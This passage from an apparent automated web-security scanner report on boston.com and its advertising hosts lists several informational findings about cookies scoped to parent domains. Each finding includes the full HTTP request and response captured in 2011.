<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1311085824&amp;rver=6.1.6206.0&amp;wp=MBI&amp;wrep
...[SNIP]...

13.87. http://r.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=3698952182471149434; pf=NDcX_zsBYGyedNXi3qMeklhJgDGRxsXL4nW-oSsu0v4AEd86v8h-PzhBRGtnAlRoz7MisnmDFDgyz0hA-2hwGyILCp316Absefd-fOvjhPhg4UsKxkd8UrM-8lcTaKyN2AjFtC80xvceGkEagrzXtBy-hX0_bBlCBt6ko5LbbGAkcmhxzSMUhyXEP1EMjVkExFUZO7_uH6uqU4TVbggO2jOScYXtrCyOtL5YGiDkh7hlk4bn-xPus8sWRzOogb2Ko6Ub-B5c11CGsJOSV6yl-VfR8cF6SPURe375GKp6bYSvaJGEcqOdIV0vwOWTLXbdMDIYID7ZwLblauWBO9dJ6djnmhRBcG78MMT2WTVsK7GKj_ObR_Lgx_f0fxn2B7QZTJgyl8xxj8sxT5XM_Pf04XQM_4vlij299-XhdmIT0lN7qezjJvpc_gGfeIy2ln9Q4O9SnyVtHz0AqUEUa2_xEzEj9SmZFZgxYPAZZU1ReJp9wr5pB9rWFBEAxIcaY_g8-enRWV78rsMGaGUivi6txG3sf48mMdMLZxguOO8FgLKy2FfDvGXCH6BefHT69H4ZzJO6hwDgE92WLdnoaYk7XdHci1lLBuj9A_ddHFEbOVmcKKgDh4XSrcl6inkLAhP12aIpwdzJxDyaFwhffSWAzkALzBcTrhfbzmMmjcKyLmBoAvId_IxJwwaMThURtDF7AZK2RzFrpw2XtDGikuUzcg5PvlThFWtQbXc8YTkhwO7it5BsUipuSlNDjCxLSzZozBJAvpZBaSiDlykcP08AmgMsEWc4vSYgRQcaCdeV2p9dOXvmlUYvchAIC41YWsfzjzp7j673BFOwj7kd5piN4nwT09t9QUFieuPTlYTYuLxN5WATvM0mK-KDbn0ZCRSDWw6VHcJi1VLZK71p2IH5G3kf_oBhwjTOnNMzLRnNQb5gQDdHCGVILQ_GSkt8jIcTv-4EXfFGgUhYxl9K8gA6q2fVPJKYMLenkR53_z7-7qD7Bhb0de3mz-u8OigGHus6lq8YqB9rag0m6x7v-6jxP7SoPWxLgwiKvYZdQW-_RL07jyp0KuHGXlNga1wgAKVUFU49Pwhd7loRStsS3dnwF_O7BA70nmZ9huNYruXOAA8ET2U8OOU9RrKIRMlaXVx3dOgC2rG0F4hrpo6NUTpDKGdGTg4F9Rl9wNcACy4XbPZTbpYuE4Dq368Sg_UiNjuOsP8vWKVE9fehI1gPZO5pxrAQeVZGg-wIZkbGkclq5RdnAUwoPSxvJ8BCKL8c227GvAPDk68AwPooBVnTHzx-zk3BzWEd-pH3IdKaEgaOIZCCl5ZiPU29H319cqixiPn-pwXdsFy2HQYJ9afeYTnFMtpkEw27lGfK23pq1Aumgf2vcGrs7cXuZiZgFiIa18-IAx8KvJar-j63j-oi0PwOaSKex4EWpR3nASqE_HAAzgcjUeD4otZDQobYTgeTOS1rQfFvcOgFtifXC4-sxdOYEcCW_dsQ_GxHZf7_C9Rdjj7D8FsOM2z6P2KvGnoosdNvtgm3hny8YL0UyMuKN8TOUFRENR76gCh00Zu_v56iMiwzmpPH34AXuKovB3TKU4sIoqbFpybTV96X4YNbFXe9HDBrGGTDDj3IewhYn5Jy6cOSQPzQiBy5eFVH9N6AHGxCHLg3OEIP65yOuneU2THS_sRn7ADdO-4XWXCJTGG1V-KE6aYeVzN2AFcUjiba83-HD2NgibLaNsuOrsqmRk15T3FIy6RYGjw5ujxgP2dw8IZyLRLGUK_tgdfhadIzcIY_BXXKEzZKEO0NM1Ei1NE2ftA-3JCuRqA5Xi4SZFb6GS2TJMoGZ3hsvTbtPyEjTn8nWELPl1sEbJhVv6P-J95rAoH3fuI-HGZbYXMU3133KhE2qoT9AMLNU18sJKtxu8BXxLsdcEU2zWU9E-Y4DkT-x03Qq8Jlq6cBCGP4Q8xWRQ4gj64NcMhc0tzll5ZRASQyIkauMP0jGeDOcQ_kDie1nv8hQPwIyPyKom0QdO2EOTpmd-0Cg8JHxzOgfL1-7Vrv-BM6-Ipu0YfMWj2PjCVytilaZ8JGajjoZ6_iD0kfD7kn--V84pp6S0KFA0wYFHOMhzRklI7Zf9h5qkCrNMlQT8wHdJkNxJrkgadu0_VlGjmgZaUhihf9dSs0Xwa5GFkfeXs9fU6PsiWYUbVG5lf90B2ggqpYAn5SWLuIsHOMBlTCwL0LnzlWXLJZOL45hdjL0BQWbyPb7s77eCWCdAu4gW26YOEpDbcBo0JqPrc2OxKq91pi574VYt6WibU4dGj5jJ3oaTYEjh9xpVCw5MH80onNdN68NqxDeNmnkOd4hHuqONPAcUfbmswfIykg5y75; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15174%7C15174%7C15174%7C15170%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15174; rv=1; adImpCount=XEl9-VrK61OYlDDbq0pGGxK9qDj9N8Yq-RC8L7M3u-b8WrdFCUa-62hysSsfECsztx3u53x713hOGdHs2hH4A54eRIbZxuCuOfEny5g4Q5vvyaMrZETwI6pLNg-8lHcwBx5j9SG9QaMmEO6nXCjUeAr8NHZqbwRfVf_7-29ZQ3dPUL1xC6vykF_wcZeiKpIDKLchE-lw9J3csr8W1qBvLKBDigDSWV-4PwxnK6BJYJ6a83X2-8gHfiZIB9yO_48CSr7DTFA1kspm4vyZz7f-oFKd1JO_8TeGfYCaP6T3mJ4nX_UyDjQuDeV0J4DxLzIImntR_7AizpE5l54qzLMxm_6hHFZ0zNTsQxcRcycfR4tb7kg2TIufO8aOmyJKxT9twngY6WXHxR32jX1daK2bVP4NfeugtrNT-H12aSBn58lYl1fS6f9VhImQOf7kzHx87ahUpcK77Ne2qQ14vbDAVuHJ7_QMGopCUKqjTPBwJfEshr9PCYO_Pb6mVf99dGqKhGsiuBXhui5dXF29duXiFLgvAmcHKK8sCB-scI9PFtZAFew1GN7UMtgNNXxIBDGXlXuOehU5wN-RBJLiWUhgGxdZlFQfkFxGhEj7DFsCIwygmLKPUl1-DSslp_jNTeEnV5sxtRpIhNFr3R4y_IbA-uMn3DJnYbuv9fB4hgflp0IXloVtNGskTE7e3pCLr9JPtq0e-Yxil5WqDNp_Xa19VpRLdmUPzQMXTGSe2mVd-mn9LwNxDUajJ0qWfPyFisaMughPUixDVERsvPoCHHfeKQrrmfCWAcYAvCODSfTx_dt6XlyPQicl36vbwbMHKmNPdxGORK015zAMTrgRK3tzOZoFHUXb2yfg6pqH2PZcFI9k8TiCteNp6LftFs52NVT1mBI4bk12UST-LnFUowS3-RvhxTFhYtQAjmMzQGuqCoHDbFDilhrLRCGCzM6wfEY1il9fyAhhdhiX5xeErwkXNyHIaOUw0k7rEWVmhg_B3BvZ_JJ1eKyIzbgt_46WlYWQgL9ZasOD_xa3su2SzMNRN2SuA9MLS8vgRbxcjF4D-VasQd-K3D1zUp50dqChmHX6C4xm9J2ryFuX1DzhXXsB8ylVhDHg-IslHHEfTEZTSA4x79w-7fs-jv4a_nay_HqcrQ8aehmYh5Jg6VXvy35gzzP6XJ_yuUArG_onsuv3vvL9MhSKhfx_0dtVyabDgbCqa6wnc6gCdYyI1-sfJpI-QBdXR0uqmDD2eYvdS9m5DXv2uz4Zb-DPt4U0OzYsfARGt8T0lbTEs5R2ssJBAXf4RzRmJLWAXWGZ7y350hPxEYbj56fbCkLTUP4e4LG-eGTJPXN0PsrITSU8C4fiFQveo7e0JuwiiBRFBNfg8FsAuVjlEcR3t9O1geSdCpLtOklDs1_dGncbBBZQER_-paQCLIkAt3Jl7cqev_X29x1h3RSVLhbvuiUEQMd1lhXf8GDmZ0Jnx2XlDSkvkmayIRlhMWfGUifX2zWUC3ltenVJv3APnigAxJ-NYybTcJEqynuxehNV1hiWOz68umgc0zIpIVjfhKS00ZzgKSyqxNn0CdXhyaotnSsGTyNwM6ZkvI_Z10U3MfELlNkmX_XPVOU0HrhNcMsSZcik8nkd49q2eNubEURCOAjIGdoxoenAt7h7IGR2M1Z1ErhKEgsUCD2hSTIUnlH_y9NqV6g7b8e07lQA1Uh8Kq3I9sxtE4bsf-D-_nx6vDTYFdjN9w06yUer67up1KhChubA5U8BJRHU7-8bdiAU5MZxUpTEkY01NGw92liBW3paDMImJKv-PTnj78C4Uzb6zF-7vU0IBAq0Nxz6oPyeu_-tlKn4wWcc1wS0BZpUrw-_JSZnVwJkpXq8ku1YJPyJs89AI-TQjOdmv_wF3yJfWo_bhgMidGdvKsEerMw_HAA_XvCa5t1ee8A8vU9soulitrQn0XilGeOl6DjUev-tK4mWDrtJp1H73ByXN3oz5PKxU1cGfc2vPHWGNNTNsd2AtHF-A_WbAOrW2okW62_imER21-Q6lk_i6e_aWY_5C8-p6ey3Fr6swBOuIBQDVITq1YTb72FJL6I4U2ltklVfhSes07iSkkal24UryHg-2ytWanyb82T2QednMHYl4wuDCc_sYs_dex6U9CJP5_90kTMsahQIAN6uq-K1m21UcyUMLvjIshMBfZQlVNcEG6K13w3b1aVS5l4sXzJE0lMAJuiEAG3g-bWk-Mf1KEz5IgS4ObpyJaRLJM8dnU1Nhl4Gj4DbtR0q02VwtV6eFe3CztMFbpkbIC8QRi-0-t0Q0lWju26SjBcFQ0SU-Q9PM_H4NT6AI8v_boZ3SdVlbIcVdR0yZ4wedowaV7UdLSZT7Vd3BZ1KiY9UBdA5uI2cB84BCr7aSv_WzT6Y4rLfuC2S9rqcVQFVrB7RXcS8ct0eawHscfZtg6DjU2kd4mzjdZAZ1N-YY92z2OVeSZ2FL5fR9kiNgijvfD-uQGvZt18MNEuRd6-og7BHQ4MLjuFAxUjCRGcr4Wz1bF_gp-HqZlvshuxvLJX9Q1uaghvWvoDX2h3Tna6Tq_5FNrC8eFEaOBiixj5GMpqN1mMqzZCd2dYo2uIBroHY1sBGoqGendnWKNriAa6B2NbARqKhnsm1CmKqgKyOK13X-vu4sXaZhAZ7dALNrlk2ZHupjzbZY4Skgdl7-1xlrgatqP0BPkDy2gYn1fKV06W2G3H81OxfZr29Puen9VV4NGp4BUq5TwT_el8ARa0B5bXFDez7TjQPThcXUuLZr2wajJbtGXgfM7CBtk-9mAyKLE0-tkghfsQnFe8RDolHxo4SRL9-K1XKoo8vmE9KuX6fSQjzEzjIjx8ScH5O8C3okRouLhhDy36dawlh2vAyUu-Jy2pQNQ; fc=ZUZU62WSV7nfkj5OuUXlEuTbw71SxSIM1JZ50RraV4iJlDq2d88xQrqQkmk8VI-DV4N7x_k-SjlCpIAKcw_aSFfb3vCZSK3GVbftks7IMxvi3Sy-PEwXW67DoFr3mtCG

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:05 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:43:04 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3698952182471149434&rnd=3988428324264951213&fpid=4&nu=n&t=
...[SNIP]...

13.88. http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue HTTP/1.1
Host: r1-ads.ace.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: ACID=gz150013044372470058; C2=9ZIJOJpwHg02Ft1BdbdRbdAmoZ0WH4fvGtFt9YA8raYrC2tBi2Uh8HbPGsOlG6PnFdw7LYQRwu/BYOpRFJ6LI4NLG/G; GUID=MTMxMDY4NDI1ODsxOjE3MGliaG4wMWNtbnEyOjM2NQ; F1=Bwthk4EBAAAABAAAAYAAeEA; BASE=RagevvmNI50lwaYGzAjLGety9H7tx6n0GOPCcMMxVO/SJzIGr4njcOMwvmlYrsF!; ROLL=2TgM2QnlNOiYjDjHBUUu5Ru+iJy9peWSGwNHI9wCApF9yfwBPXWGZfL!; aceRTB=rm%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Cam%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Cdc%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Can%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Crub%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7C; A07L=39VpRQiFM7Ejog5CPRr6l003MZh1efyTZJsx0cnm7dLyA8oEYfYNzwQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1040486.808880.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 19 Jul 2011 20:44:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 615
Date: Tue, 19 Jul 2011 20:44:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=vyeJOJpwHg02F8wBdbdBPcAmoZwDH4fvG8At9YA8raUYC2tBi2URwGbPGsOlGJLnFZw7LYM+wuvBYOpB5L6LI4NLGOCqyBwHcZAS; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: F1=B8K7l4EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: BASE=RagegvmNI50lwaYGzAjLGety9H7tx6n0GOPCcMMxVO/SJzIGr4njcOMwvmlYrsFznFYf9CM!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: ROLL=2TgMxQnPNOiYeID!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: 14768994=_4e25ecaf,8285755238,808880^1040486^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5645623.4;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0
...[SNIP]...

13.89. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.90. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.91. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.92. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:02 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.93. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.94. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977?_RM_EMPTY_& HTTP/1.1
Host: rmedia.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:02 GMT
Server: Apache
Set-Cookie: RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

